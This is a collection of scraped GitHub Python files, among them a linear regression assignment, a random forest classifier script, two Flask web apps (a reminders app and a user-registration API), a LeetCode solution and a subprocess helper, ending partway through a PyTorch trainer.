pd.ExcelWriter(config['reduce_output'].replace(\"csv\" , \"xlsx\"))\n orig_cv.to_excel(xlsx, 'All')\n summary.to_excel(xlsx, 'Summary')\n xlsx.save()\n\nif __name__ == \"__main__\":\n import argparse\n parser = argparse.ArgumentParser()\n\n parser.add_argument('-i', '--init', action='store_true', default=False,\n help=\"Init config file & sync to cluster\")\n\n parser.add_argument('-r', '--reduce', action='store_true', default=False,\n help=\"Reduce, ie.: compute scores\")\n\n options = parser.parse_args()\n\n if options.init:\n init()\n\n elif options.reduce:\n reducer()","repo_name":"neurospin/scripts","sub_path":"2013_adni/MCIc-CTL-FS/03_tvenet_modselectcv_cs.py","file_name":"03_tvenet_modselectcv_cs.py","file_ext":"py","file_size_in_byte":59034,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"81"} +{"seq_id":"24817081377","text":"import platform\nimport subprocess\nfrom dataclasses import dataclass\nfrom pathlib import Path\nfrom typing import Union, Optional\n\nimport core.enums\n\n\ndef get_abs_path(path_: Union[str, Path]) -> Path:\n return Path(str(path_)).expanduser().resolve().absolute()\n\n\n@dataclass\nclass FinishedProcess:\n command: str\n work_dir: str\n process: 'subprocess.Popen'\n stdout: str\n stderr: Optional[str]\n\n\ndef spawn_and_communicate_with_subprocess(\n command: str,\n work_dir: Union[str, Path],\n return_error: bool = True,\n with_shell: bool = False,\n _encoding: str = 'utf-8',\n _errors: str = 'ignore',\n) -> FinishedProcess:\n work_dir = str(work_dir)\n with subprocess.Popen(\n command,\n stdout=subprocess.PIPE,\n stderr=subprocess.PIPE,\n cwd=work_dir,\n shell=with_shell,\n ) as process:\n output, error = process.communicate()\n\n _output = output.decode(_encoding, _errors)\n _error = error.decode(_encoding, _errors)\n\n if not process.returncode or return_error:\n return FinishedProcess(command, work_dir, process, _output, _error)\n\n raise RuntimeError(\n f'{command} at {work_dir} caused the following error:\\n'\n f'{error}\\n'\n f'Return code: {process.returncode}'\n )\n\n\ndef get_current_os() -> 'core.enums.PlatformVersion':\n \"\"\"\n\n :return: Tries to return an enum representing the current os.\n Supported OSes are:\n * Windows\n * Linux\n * Mac (Darwin)\n\n :rtype: core.enums.PlatformVersion\n \"\"\"\n current_os = platform.system()\n try:\n return core.enums.PlatformVersion(current_os)\n except ValueError as err:\n # noinspection PyUnresolvedReferences\n supported_oses: list[str] = [p.value for p in core.enums.PlatformVersion]\n raise OSError(\n f'Unsupported system: {current_os}\\n'\n f'Supported systems are: {\", \".join(supported_oses)}'\n ) from err\n","repo_name":"DobroAlex/laolab-nmap-test","sub_path":"core/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2040,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"14159524645","text":"# CS121 Linear regression\n#\n# Kristen Witte, kwitte\n\nimport numpy as np\nfrom asserts import assert_Xy, assert_Xbeta\n\n\n#############################\n# #\n# Our code: DO NOT MODIFY #\n# #\n#############################\n\n\ndef prepend_ones_column(A):\n '''\n Add a ones column to the left side of an array\n\n Inputs: \n A: a numpy array\n\n Output: a numpy array\n '''\n ones_col = np.ones((A.shape[0], 1))\n return np.hstack([ones_col, A])\n\n\ndef linear_regression(X, y):\n '''\n Compute linear regression. Finds model, beta, that minimizes\n X*beta - Y in a least squared sense.\n\n Accepts inputs with type array\n Returns beta, which is used only by apply_beta\n\n Examples\n --------\n >>> X = np.array([[5, 2], [3, 2], [6, 2.1], [7, 3]]) # predictors\n >>> y = np.array([5, 2, 6, 6]) # dependent\n >>> beta = linear_regression(X, y) # compute the coefficients\n >>> beta\n array([ 1.20104895, 1.41083916, -1.6958042 ])\n >>> apply_beta(beta, X) # apply the function defined by beta\n array([ 4.86363636, 2.04195804, 6.1048951 , 5.98951049])\n '''\n assert_Xy(X, y, fname='linear_regression')\n\n X_with_ones = prepend_ones_column(X)\n\n # Do actual computation\n beta = np.linalg.lstsq(X_with_ones, y)[0]\n\n return beta\n\n\ndef apply_beta(beta, X):\n '''\n Apply beta, the function generated by linear_regression, to the\n specified values\n\n Inputs:\n model: beta as returned by linear_regression\n Xs: 2D array of floats\n\n Returns:\n result of applying beta to the data, as an array.\n\n Given:\n beta = array([B0, B1, B2,...BK])\n Xs = array([[x11, x12, ..., x0K],\n [x21, x22, ..., x1K],\n ...\n [xN1, xN2, ..., xNK]])\n\n result will be:\n array([B0+B1*x11+B2*x12+...+BK*x1K,\n B0+B1*x21+B2*x22+...+BK*x2K,\n ...\n B0+B1*xN1+B2*xN2+...+BK*xNK])\n '''\n assert_Xbeta(X, beta, fname='apply_beta')\n\n # Add a column of ones\n X_incl_ones = prepend_ones_column(X)\n\n # Calculate X*beta\n yhat = np.dot(X_incl_ones, beta)\n return yhat\n\n\ndef read_file(filename):\n '''\n Read data from the specified file. Split the lines and convert\n float strings into floats. Assumes the first row contains labels\n for the columns.\n\n Inputs:\n filename: name of the file to be read\n\n Returns:\n (list of strings, 2D array)\n '''\n with open(filename) as f:\n labels = f.readline().strip().split(',')\n data = np.loadtxt(f, delimiter=',', dtype=np.float64)\n return labels, data\n\n\n###############\n# #\n# Your code #\n# #\n###############\n\ndef calculate_R2(curr_yhats, y_test, y_mean):\n '''\n Compute the R2 value for given data\n\n Inputs:\n curr_yhats = numpy array derived from apply_beta\n y_test: numpy array for the dependent variable. Either from \n training.csv or testing.csv depending on find_R2\n y_mean: average of y* derived from either training.csv \n or testing.csv depending on find_R2 \n\n Returns:\n r2: R^2 value as a float\n '''\n\n numerator = []\n denominator = []\n\n for i, yn in enumerate(y_test):\n yhat = curr_yhats[i]\n top = (yn - yhat)**2\n bottom = (yn - y_mean)**2\n numerator.append(top)\n denominator.append(bottom)\n\n sum_numerator = sum(numerator)\n sum_denominator = sum(denominator)\n r2 = 1 - (sum_numerator/sum_denominator)\n\n return r2\n\ndef find_R2(x_train, y_train, y_mean, x_test = None, y_test = None):\n '''\n Find the R2 value for given data using linear_regression and apply_beta\n\n Inputs:\n x_train: independent variable data from training.csv\n y_train: dependent variab data from training.csv\n y_mean: average of y* (default from training.csv or if \n x_test is not None, testing.csv)\n Optional Inputs:\n x_test: independent variable data from testing.csv\n y_test: dependent variab data from testing.csv\n\n Returns:\n r2: R^2 value as a float\n '''\n\n if x_test is not None:\n beta = linear_regression(x_train, y_train)\n yhats = apply_beta(beta, x_test)\n r2 = calculate_R2(yhats, y_test, y_mean)\n else:\n beta = linear_regression(x_train, y_train)\n yhats = apply_beta(beta, x_train)\n r2 = calculate_R2(yhats, y_train, y_mean)\n return r2\n\ndef build_K_arrays(dex, cat, temp_arrays, r2s, base_category, remaining,\n base_num_rows, y_train, y_mean, temp_train_data = None, y_test = None):\n '''\n Builds numpy arrays of K categories. Used in a for loop in\n get_R2 \"Arbitrary\"\n\n Inputs:\n dex: current index\n cat: current category\n temp_arrays: empty dictionary to store numpy arrays for K categories\n r2s: empty dicitonary to store R2s for K categories\n base_category: numpy array for K = 1\n remaing: numpy array for the reamining data after removing \n base_category data\n base_num_rows: numer of rows in base_category\n y_train: numpy array for the y data from training.csv\n y_mean: average of the y values for either the training.csv\n or the testing.csv (if y_test is not None)\n Optional inputs:\n temp_train_data: dictionary storing the training numpy array\n for K categories\n y_test: numpy array for the y data from testing.csv\n\n Returns:\n r2s: filled dictionary of R2s for K categories\n temp_arrays: filled dictionary of numpy arrays for K categories\n If y_test is None:\n temp_data: numpy array for K categories (solely for training data)\n '''\n\n temp_data = np.empty([base_num_rows, 0])\n temp_data = np.append(temp_data, \n base_category, axis = 1)\n additional_category = remaining[:,[dex]]\n temp_data = np.append(temp_data, \n additional_category, axis = 1)\n temp_arrays[cat] = temp_data\n\n if y_test is None:\n r2 = find_R2(temp_data, y_train, y_mean)\n else:\n r2 = find_R2(temp_train_data, y_train, y_mean, temp_data, y_test)\n \n r2s[cat] = r2\n\n if y_test is None:\n return r2s, temp_arrays, temp_data\n else:\n return r2s, temp_arrays\n\n\ndef ratio_less_than_threshold(all_variables, compiled_data, threshold):\n '''\n Determines if the increase in K R^2 from K-1 R^2 is greater than threshold\n\n Inputs:\n all_variables: a list of all the current column categories\n compiled_data: dictionary of the categories and their R^2 values\n threshold: float\n\n Returns:\n Boolean\n If Boolean is True, also returns the K-1 category\n '''\n\n assert len(list(compiled_data.keys())) >= 2\n assert threshold is not None\n\n k_categories = ','.join(all_variables)\n k_1_variables = all_variables[:-1]\n k_subtract_1_categories = ','.join(k_1_variables)\n\n k_r2 = compiled_data[k_categories]\n k_subtract_1_r2 = compiled_data[k_subtract_1_categories]\n\n percent_increase = (k_r2/k_subtract_1_r2) - 1\n\n if percent_increase < threshold:\n return True, k_subtract_1_categories\n else:\n return False, None\n\n\ndef get_R2(col_names, data_train, num_vars, data_test = None, \n threshold = None):\n '''\n Returns the R2 squared value(s) using linear regression\n\n Inputs:\n col_names: a list of the column names from the read in data_test\n data_train: a numpy array of the data from training.csv \n num_vars: string indicating amount of data to include \n in the linear regression\n Options:\"Single\": R^2 value for each column \n \"Multi\": R^2 value for all columns\n \"BiVar\": R^2 value for pairs of columns\n \"Arbitrary\": R^2 value for K columns\n Optional Inputs:\n *Only used when num_vars is \"Arbitrary\"*\n data_test: a numpy array of the data from testing.csv\n threshold: minimum percent that R^2 must increase by with\n increasing K\n\n Returns:\n Options:\"Single\": a list of the R^2 values \n \"Multi\": a list of the R^2 value (single element)\n \"BiVar\": two single element lists. One of the Category \n pair with the highest R^2. One of the R^2 value\n for that pair.\n \"Arbitrary\": a dictionary of 1 <= K <= N categories and \n the corresponding R^2 value for K.\n If threshold is not None: a second dictionary with the \n K-1 categories and the corresponding R^2 value such that\n the percent increase of K R^2 to K-1 R^2 is less than\n threshold.\n '''\n\n total_cols = len(col_names)\n y_train = data_train[:, (total_cols - 1)]\n all_training = data_train[: , 0:total_cols - 1]\n\n y_mean = (y_train.sum()/len(y_train))\n \n if data_test is not None:\n y_test = data_test[:, (total_cols - 1)]\n all_test = data_test[: , 0:total_cols - 1]\n y_mean = (y_test.sum()/len(y_test))\n \n num_categories = total_cols - 1\n\n r2_values = []\n\n if num_vars == \"Single\":\n for i in range(num_categories):\n curr_train_category = all_training[:,[i]] \n if data_test is not None:\n curr_test_category = all_test[:,[i]]\n r2 = find_R2(curr_train_category, y_train, \n y_mean, curr_test_category, y_test)\n else: r2 = find_R2(curr_train_category, y_train, \n y_mean)\n r2_values.append(r2)\n return r2_values\n \n elif num_vars == \"Multi\":\n r2 = find_R2(all_training, y_train, y_mean)\n r2_values.append(r2)\n return r2_values\n \n elif num_vars == \"BiVar\":\n paired_r2 = {}\n for i in range(num_categories):\n base_category = all_training[:,[i]]\n for j in range(i+1, num_categories):\n paired_category = all_training[:,[j]]\n bivar_data = np.concatenate((base_category, \n paired_category), axis = 1)\n r2 = find_R2(bivar_data, y_train, y_mean)\n pair = col_names[i] + \":\" + col_names[j]\n paired_r2[pair] = r2\n\n highest_r2 = 0\n for pair in paired_r2:\n r2 = paired_r2[pair]\n if r2 >= highest_r2:\n highest_r2 = r2\n highest_pair = [pair]\n\n r2_values.append(highest_r2)\n\n return highest_pair, r2_values\n\n elif num_vars == \"Arbitrary\":\n\n compiled_data = {}\n\n if data_test is not None:\n single_test_r2s = get_R2(col_names, data_train, \n \"Single\", data_test)\n \n single_r2s = get_R2(col_names, data_train, \"Single\")\n highest_r2 = 0\n for i, r2 in enumerate(single_r2s):\n if r2 >= highest_r2:\n highest_r2 = r2\n highest_category = col_names[i]\n index_highest_category = i\n \n all_variables = [highest_category]\n category_names = highest_category\n \n if data_test is not None:\n compiled_data[category_names] = single_test_r2s[index_highest_category]\n else:\n compiled_data[category_names] = single_r2s[index_highest_category]\n\n base_train_category = all_training[:,[index_highest_category]]\n base_train_rows = len(base_train_category)\n if data_test is not None:\n base_test_category = all_test[:,[index_highest_category]]\n base_test_rows = len(base_test_category)\n\n remaining_training = np.delete(all_training, \n [index_highest_category], axis = 1)\n if data_test is not None:\n remaining_test = np.delete(all_test, \n [index_highest_category], axis = 1)\n\n remaining_cols = [x for x in col_names if x != highest_category]\n remaining_cols.pop() #remove the totals column\n num_remaining = len(remaining_cols)\n \n best = {} #for thresholding\n\n for i in range(num_remaining):\n temp_train_arrays = {} #temp arrays\n temp_test_arrays = {}\n train_r2s = {} #r2s\n test_r2s = {}\n for j, category in enumerate(remaining_cols):\n if category not in all_variables:\n train_r2s, temp_train_arrays, temp_train_data = build_K_arrays(j,\n category, temp_train_arrays, train_r2s, base_train_category,\n remaining_training, base_train_rows, y_train, y_mean)\n \n if data_test is not None:\n test_r2s, temp_test_arrays = build_K_arrays(j, category, \n temp_test_arrays, test_r2s, base_test_category, remaining_test,\n base_test_rows, y_train, y_mean, temp_train_data, y_test)\n \n highest_r2 = 0\n for category in train_r2s:\n current_r2 = train_r2s[category]\n if current_r2 >= highest_r2:\n highest_r2 = current_r2\n highest_category = category #From the train data\n base_train_category = temp_train_arrays[highest_category]\n if data_test is not None:\n base_test_category = temp_test_arrays[highest_category]\n\n all_variables.append(highest_category)\n\n category_names = ','.join(all_variables)\n if data_test is not None:\n compiled_data[category_names] = test_r2s[highest_category]\n else:\n compiled_data[category_names] = train_r2s[highest_category]\n if threshold != None:\n x, final_key = ratio_less_than_threshold(all_variables, \n compiled_data, threshold)\n\n if not best:\n if x:\n best[final_key] = compiled_data[final_key]\n \n if threshold != None:\n return compiled_data, best\n return compiled_data\n\n\ndef print_dict_data(d):\n '''\n Prints out the info from a dictionary in an easy to read format\n\n Inputs:\n d: dictionary\n\n Returns:\n prints out data from dictionary.\n '''\n\n for key in d:\n print(key + \" : \" + str(d[key]))\n\n\ndef make_table(r2_values, names):\n '''\n Makes a table for the provided r2_values and the k_categories\n\n Inputs:\n r2_values: list of R2 values\n names: list of names\n **indices of names and r2_values must match\n\n Returns:\n prints out a nicely formatted table.\n '''\n\n COLUMN_WIDTH = 18\n COLUMN_SEP = \"|\" \n\n names.insert(0, \"Category\")\n r2_values.insert(0, \"R2\")\n\n table = []\n for i, name in enumerate(names):\n insert = []\n insert = make_column(name, insert, COLUMN_WIDTH, COLUMN_SEP)\n insert = make_column(r2_values[i], insert, COLUMN_WIDTH, COLUMN_SEP)\n insert.append('\\n')\n table.append(insert)\n\n for row in table:\n line = ''.join(row)\n print(line)\n\n\ndef make_column(current_input, insert, COLUMN_WIDTH, COLUMN_SEP):\n '''\n Makes a column insert for table\n\n Inputs:\n current_input: a the category name or r2 values\n insert: an empty list\n COLUMN_WIDTH: integer\n COLUMN_SEP: string\n\n Returns:\n insert: a single element list. \n Element is the string for that column\n '''\n\n inp = current_input\n t = type(inp)\n if t == np.float64 or t == int:\n inp = str(inp)\n curr_characters = len(inp)\n space = [' ']\n diff = COLUMN_WIDTH - curr_characters\n if diff < 0:\n num_characters = abs(diff+1)\n inp = inp[:diff]\n else:\n while len(space) < diff:\n space.append(' ')\n spaces = ''.join(space)\n insert.append(inp)\n insert.append(spaces)\n insert.append(COLUMN_SEP)\n\n return insert\n","repo_name":"kwitte2232/CS121","sub_path":"pa6/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":16273,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"4190333541","text":"\n# coding: utf-8\n\n## Import libraries and modules\nimport numpy as np\nimport pandas as pd\nimport pprint\n\nfrom sklearn import pipeline\nfrom sklearn import preprocessing\nfrom sklearn import feature_selection\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.model_selection import GridSearchCV\nfrom sklearn.externals import joblib \n\n##Load the data.\ndata = pd.read_csv(filepath_or_buffer='./classify.csv', sep=' ', header=None)\n#print data.head()\n#print data.shape\n\n## Drop the last column\ndata.drop(labels=data.columns[len(data.columns)-1], axis=1, inplace=True)\n#print data.head()\n\n## Split data into feature-matrix and the target-vector\ny = data.iloc[:,0]\nX = data.iloc[:, 1:len(data.columns)]\n\n## Make pipeline using data preprocessing step, best k-features selection step and classifier algo step\npipe = pipeline.Pipeline([('scaler', preprocessing.StandardScaler()), \n ('selectkbest', feature_selection.SelectKBest()),\n ('randomforestclassifier', RandomForestClassifier(random_state=222))])\n#print pipeline.get_params()\n\n## Random Forest Classifier without prunning:\n## Declare default hyperparameters to tune i.e. giving the default values as it is\ndefaulat_hyperparam = {'selectkbest__k':[17]} # selecting all the features in the default no-prun run\n\n## Create model without pruning using cross-validation pipeline\nno_prune_clf = GridSearchCV(estimator=pipe, param_grid=defaulat_hyperparam, scoring=\"f1\", cv=10)\nno_prune_clf.fit(X, y)\n\n## Refit on the entire training set\n# No additional code needed if no_prune_clf.refit == True (default is True)\n\n## Feature-selection scores\nfeatures = no_prune_clf.best_estimator_.named_steps['selectkbest']\nprint(\"\\n******** Random-Forest Classifier: No pruning: All features\")\nprint(\"The feature selection scores(ANOVA F-value between label/feature) are as follows:\")\nprint(\"Feature Score \")\nfor itr in range(X.shape[1]):\n print((str(itr+1) +\" \"+str(features.scores_[itr])))\n\n## F1 score for Classifier without pruning:\nprint(\"\\n******** Random-Forest Classifier: No pruning: All features: 10-fold Cross-Validation results: \")\npprint.pprint(no_prune_clf.cv_results_)\n\nprint(\"******** Random-Forest Classifier: No pruning: All features: F1-score of the best estimator: \", no_prune_clf.best_score_)\n\n##Save model for future use\njoblib.dump(no_prune_clf, 'no_prune_clf.pkl')\n# To load: no_prune_clf = joblib.load('no_prune_clf.pkl')\n\n# Random Forest Classifier with prunning:\n## Declare hyperparameters for prunning\npruning_hyperparam = { 'selectkbest__k':[12]\n #randomforestclassifier__n_estimators' : [10]\n #,randomforestclassifier__max_features' : ['sqrt']\n ,'randomforestclassifier__min_samples_leaf' : [2]\n ,'randomforestclassifier__min_samples_split' : [4]\n }\n\n## Create model with pruning using cross-validation pipeline\npruned_clf = GridSearchCV(estimator=pipe, param_grid=pruning_hyperparam, scoring=\"f1\", cv=10)\npruned_clf.fit(X, y)\n\n## F1 score for Classifier with pruning:\nprint(\"\\n******** Random-Forest Classifier: With pruning : Pruning parameters are set as follows:\")\nprint(\"Number of best features to be considered (out of 17): 12\")\nprint(\"min_samples_leaf(The minimum number of samples required to be at a leaf node): 2 \")\nprint(\"min_samples_split(The minimum number of samples required to split an internal node): 4 \")\n\nprint(\"\\n******** Random-Forest Classifier: With pruning : 10-fold Cross-Validation results: \")\npprint.pprint(pruned_clf.cv_results_)\n\nprint(\"\\n******** Random-Forest Classifier: With pruning : F1-score of the best estimator: \", pruned_clf.best_score_)\n\n#Save model for future use\njoblib.dump(pruned_clf, 'pruned_clf.pkl');\n# To load: pruned_clf = joblib.load('pruned_clf.pkl')\n\n","repo_name":"sangramga/AdvancedPython","sub_path":"RF_Classify_ToBeSubmitted.py","file_name":"RF_Classify_ToBeSubmitted.py","file_ext":"py","file_size_in_byte":3846,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"4426052951","text":"from os import abort\nfrom flask import Flask, render_template, request\nimport sqlite3\n\napp = Flask(__name__)\nnext_id = 1\nreminders = {}\n\ndef get_db_connection():\n conn = sqlite3.connect('web_reminders.db')\n conn.row_factory = sqlite3.Row\n return conn\n\ndef create_table(): \n conn = get_db_connection()\n cursor = conn.cursor()\n\n cursor.execute('''CREATE TABLE IF NOT EXISTS reminders (\n id INTEGER PRIMARY KEY,\n title TEXT NOT NULL,\n content TEXT NOT NULL,\n priority INTEGER NOT NULL\n )''')\n\n conn.commit()\n conn.close()\n\ncreate_table()\n\ndef delete_reminder(reminder_id):\n conn = get_db_connection()\n cursor = conn.cursor()\n\n cursor.execute(\"DELETE FROM reminders WHERE id=?\", (reminder_id,))\n\n conn.commit()\n conn.close()\n\n@app.route('/')\ndef home():\n return render_template('index.html')\n\n@app.route('/addReminder')\ndef add():\n return render_template('addReminder.html')\n\n@app.route('/updateReminder')\ndef upd():\n return render_template('updateReminder.html')\n\n@app.route('/showReminder', methods=['POST'])\ndef save_reminder():\n name = request.form['name']\n content = request.form['content']\n priority = int(request.form['priority']) \n\n conn = get_db_connection()\n cursor = conn.cursor()\n\n cursor.execute(\"INSERT INTO reminders (title, content, priority) VALUES (?, ?, ?)\",\n (name, content, priority))\n\n conn.commit()\n conn.close()\n\n reminder = {\n 'title': name,\n 'content': content,\n 'priority': priority,\n }\n\n return render_template('showReminder.html', reminder=reminder)\n\n@app.route('/allReminders')\ndef show_all_reminders():\n page = request.args.get('page', 1, type=int)\n per_page = 5\n\n conn = get_db_connection()\n cursor = conn.cursor()\n cursor.execute(\"SELECT COUNT(*) FROM reminders\")\n total_reminders = cursor.fetchone()[0]\n total_pages = (total_reminders + per_page - 1) // per_page\n\n if page < 1 or page > total_pages:\n abort(404)\n\n offset = (page - 1) * per_page\n cursor.execute(\"SELECT * FROM reminders LIMIT ? OFFSET ?\", (per_page, offset))\n reminders = cursor.fetchall()\n conn.close()\n\n return render_template('allReminders.html', reminders=reminders, page=page, total_pages=total_pages)\n\n@app.route('/deleteReminder/<int:reminder_id>', methods=['POST'])\ndef delete_single_reminder(reminder_id):\n delete_reminder(reminder_id)\n return render_template('deletedReminder.html', reminder_id=reminder_id)\n\n@app.route('/updateReminder/<int:reminder_id>', methods=['GET', 'POST'])\ndef update_reminder(reminder_id):\n conn = get_db_connection()\n cursor = conn.cursor()\n cursor.execute(\"SELECT * FROM reminders WHERE id=?\", (reminder_id,))\n reminder = cursor.fetchone()\n\n if not reminder:\n abort(404)\n\n if request.method == 'POST':\n try:\n title = request.form['title']\n content = request.form['content']\n priority = int(request.form['priority'])\n\n cursor.execute(\"UPDATE reminders SET title=?, content=?, priority=? WHERE id=?\",\n (title, content, priority, reminder_id))\n\n conn.commit()\n\n cursor.execute(\"SELECT * FROM reminders WHERE id=?\", (reminder_id,))\n updated_reminder = cursor.fetchone()\n\n conn.close()\n\n return render_template('showReminder.html', reminder=updated_reminder)\n\n except KeyError:\n message = \"Incomplete form data. Please provide all required fields.\"\n return render_template('updateReminder.html', reminder=reminder, error_message=message)\n\n conn.close()\n return render_template('updateReminder.html', reminder=reminder)\n\nif __name__ == '__main__':\n app.run(debug=True)\n","repo_name":"marko-teovanovic/WebApp_Reminder","sub_path":"Reminder.py","file_name":"Reminder.py","file_ext":"py","file_size_in_byte":3875,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"18047750090","text":"class Solution:\n def findDuplicate(self, nums: List[int]) -> int:\n start, end = 0, len(nums) - 1\n ans = 0\n while start <= end:\n mid = start + (end-start) // 2\n count = 0\n for num in nums:\n if num <= mid:\n count += 1\n if count <= mid:\n start = mid + 1\n else:\n ans = mid\n end = mid - 1\n \n return ans\n \n # negative marking - violates the constraints but it is faster and real interesting\n # for i in range(len(nums)):\n # if nums[abs(nums[i])] < 0:\n # ans = abs(nums[i])\n # break\n # nums[abs(nums[i])] = -nums[abs(nums[i])]\n \n # for i in range(len(nums)):\n # nums[i] = abs(nums[i])\n \n # return ans\n","repo_name":"Mussie7/A2SV-community-questions-answer-codes","sub_path":"new converts ramp up/find the duplicate number.py","file_name":"find the duplicate number.py","file_ext":"py","file_size_in_byte":878,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"16114530487","text":"from models.db_models.models import Users, UserLogins, UserInfo,Clients,ClientInfo,UserConfirmationCodes,UserFavoriteProducts\nfrom db.db import session\nfrom flask import Flask, jsonify, request\nfrom flask_restful import Resource, fields, marshal_with, abort, reqparse\nimport modules.db_model_tranformer_modules.db_model_transformer_module as db_transformer\nimport datetime\nimport base64\nimport modules.http.send_sms_module as sms_sender\n# PARAMS\nENTITY_NAME = \"Quick User Registration\"\n# MODEL = Users\nROUTE = \"/quickUserRegistration\"\nEND_POINT = \"quick-user-registration\"\n\n# NESTED SCHEMA FIELDS\navatar_data_fields = {\n 'id': fields.Integer,\n 'original_file_name': fields.String,\n 'file_path': fields.String,\n 'file_size': fields.Integer,\n 'uid': fields.String,\n 'user_creator_id': fields.Integer,\n 'upload_date': fields.DateTime,\n 'thumb_file_path': fields.String,\n 'optimized_size_file_path': fields.String\n}\nuser_info_data = {\n \"id\":fields.Integer,\n \"user_id\":fields.Integer,\n \"email\":fields.String,\n \"phone_number\":fields.String,\n \"birthday\":fields.String,\n 'avatar_id':fields.Integer,\n 'avatar_data':fields.Nested(avatar_data_fields)\n}\n\nuser_role_data = {\n 'id': fields.Integer,\n 'name': fields.String,\n 'title': fields.String,\n\n}\n\nuser_client_data = {\n 'id': fields.Integer,\n 'name': fields.String,\n 'registration_number': fields.String\n}\n\nuser_login_data = {\n 'id': fields.Integer,\n 'login': fields.String,\n 'last_login_date': fields.DateTime\n}\n\nuser_confirmation_code_fields ={\n 'id':fields.Integer,\n 'code':fields.String\n}\n\nuser_favorites_products_fields ={\n 'id':fields.Integer,\n 'products_ids':fields.List(fields.Integer)\n}\n\n\n# OUTPUT SCHEMA\noutput_fields = {\n 'id': fields.Integer,\n 'name': fields.String,\n 'lock_state': fields.Boolean,\n 'client_data': fields.Nested(user_client_data),\n 'user_role_data': fields.Nested(user_role_data),\n 'user_login': fields.Nested(user_login_data),\n 'user_info_data':fields.Nested(user_info_data),\n 'user_confirmation_code_data': fields.Nested(user_confirmation_code_fields),\n 'user_favorites_products': fields.Nested(user_favorites_products_fields)\n}\n# API METHODS FOR LIST ENTITIES\nclass QuickUserRegistrationResource(Resource):\n def __init__(self):\n self.route = ROUTE\n self.end_point = END_POINT\n pass\n\n @marshal_with(output_fields)\n def post(self):\n error_message = \"\"\n try:\n # send_user_phone = '+77077750095'\n # send_code = '0945'\n # sms_sender.send_sms(send_user_phone, send_code)\n\n json_data = request.get_json(force=True)\n\n phone_number = json_data['phone_number']\n\n user_login = session.query(UserLogins).filter(UserLogins.login==phone_number).first()\n\n if (user_login!=None):\n error_message = \"Пользователь с таким номером уже существует системе!\"\n abort(400, message=\"\")\n\n\n clients_args ={}\n clients_args[\"name\"] = json_data[\"client_name\"]\n clients_args[\"client_type_id\"] = 3\n client_entity = Clients(clients_args)\n session.add(client_entity)\n session.commit()\n\n client_id = client_entity.id\n\n client_info_args ={}\n client_info_args[\"client_id\"] = client_id\n client_info_entity = ClientInfo(client_info_args)\n session.add(client_info_entity)\n session.commit()\n\n users_args ={}\n users_args['name']=json_data[\"user_name\"]\n users_args['client_id']=client_id\n users_args['user_role_id']=4\n users_args['lock_state']=True\n user_entity = Users(users_args)\n session.add(user_entity)\n session.commit()\n\n user_login_args = {}\n user_login_args['user_id'] = user_entity.id\n user_login_args['login'] = phone_number\n user_login_args['password'] = str(base64.b64encode(bytes(json_data[\"password\"],\"utf-8\")))\n user_login_entity = UserLogins(user_login_args)\n session.add(user_login_entity)\n session.commit()\n\n user_info_args = {}\n user_info_args['user_id'] = user_entity.id\n user_info_args['phone_number'] ='+'+phone_number\n user_info_entity = UserInfo(user_info_args)\n session.add(user_info_entity)\n session.commit()\n\n user_confirmation_code_args = {}\n user_confirmation_code_args['user_id'] = user_entity.id\n user_confirmation_entity = UserConfirmationCodes(user_confirmation_code_args)\n session.add(user_confirmation_entity)\n session.commit()\n\n user_favorites_args = {}\n user_favorites_args['user_id'] = user_entity.id\n user_favorites_args['products_ids'] =[]\n user_favorites_entity = UserFavoriteProducts(user_favorites_args)\n session.add(user_favorites_entity)\n session.commit()\n\n\n user = session.query(Users).filter(Users.id==user_entity.id).first()\n user.user_confirmation_code_data = user_confirmation_entity\n user.user_favorites_products = user_favorites_entity\n if (not user):\n abort(400, message =\"Данные не найдены\")\n\n login = session.query(UserLogins).filter(UserLogins.user_id == user_entity.id).first()\n user_info = session.query(UserInfo).filter(UserInfo.user_id == user.id).first()\n user.user_login = login\n user.user_info_data = user_info\n\n send_user_phone = '+'+phone_number\n # send_user_phone = '+77077750095'\n # 77718961663\n send_code = str(user_confirmation_entity.code)\n sms_sender.send_sms(send_user_phone,send_code)\n return user, 201\n\n\n except Exception as e:\n session.rollback()\n abort(400, message=error_message, code=400)\n","repo_name":"vyadzmak/OTA.Api","sub_path":"cross_res/quick_user_registration_resources.py","file_name":"quick_user_registration_resources.py","file_ext":"py","file_size_in_byte":6121,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"28267213505","text":"import torch\nfrom torch.utils.data import DataLoader\nfrom torch.utils.tensorboard import SummaryWriter\nfrom tqdm import tqdm\n\nfrom Code.data.dataloaders import get_image_dataloader\nfrom Code.data.heb_data import create_street_names_data_iterators\nfrom Code.data.hybrid_data import HybridDataSet\nfrom Code.models.heb_model import HebLetterToSentence\nfrom Code.models.hybrid_model import HybridModel\nfrom Code.trianer.train_images import Trainer\nfrom Code.utils.helpers import load_resnet_model\n\n\nclass HybridTrainer(Trainer):\n def __init__(self, train_dataloader, eval_dataloader, model, optim, summary_writer,\n criteria=torch.nn.CrossEntropyLoss().cuda(), save_checkpoint=200,device='cuda'):\n super(HybridTrainer, self).__init__(train_dataloader, eval_dataloader, model, optim, summary_writer,\n criteria=criteria, save_checkpoint=save_checkpoint)\n\n self.device = device\n\n\n def train_epoch(self):\n avg_loss = 0\n for x, y in tqdm(self.train_dataloader):\n self.model.train()\n self.optim.zero_grad()\n x, y = x.to(self.device), y.to(self.device)\n y_hat, _ = self.model(x)\n loss = self.criteria(y_hat.squeeze(1), y)\n avg_loss += loss.item()\n loss.backward()\n self.optim.step()\n return avg_loss / len(self.train_dataloader)\n\n\n\n def log_epoch(self, acc_log, avg_loss, device, epoch, loss_log, summary_writer):\n # display\n # acc_test = accuracy(self.model, self.eval_dataloader, device)\n # acc_train = accuracy(self.model, self.train_dataloader, device)\n print(f\"loss[{epoch}] = {avg_loss / self.train_size}\")\n # 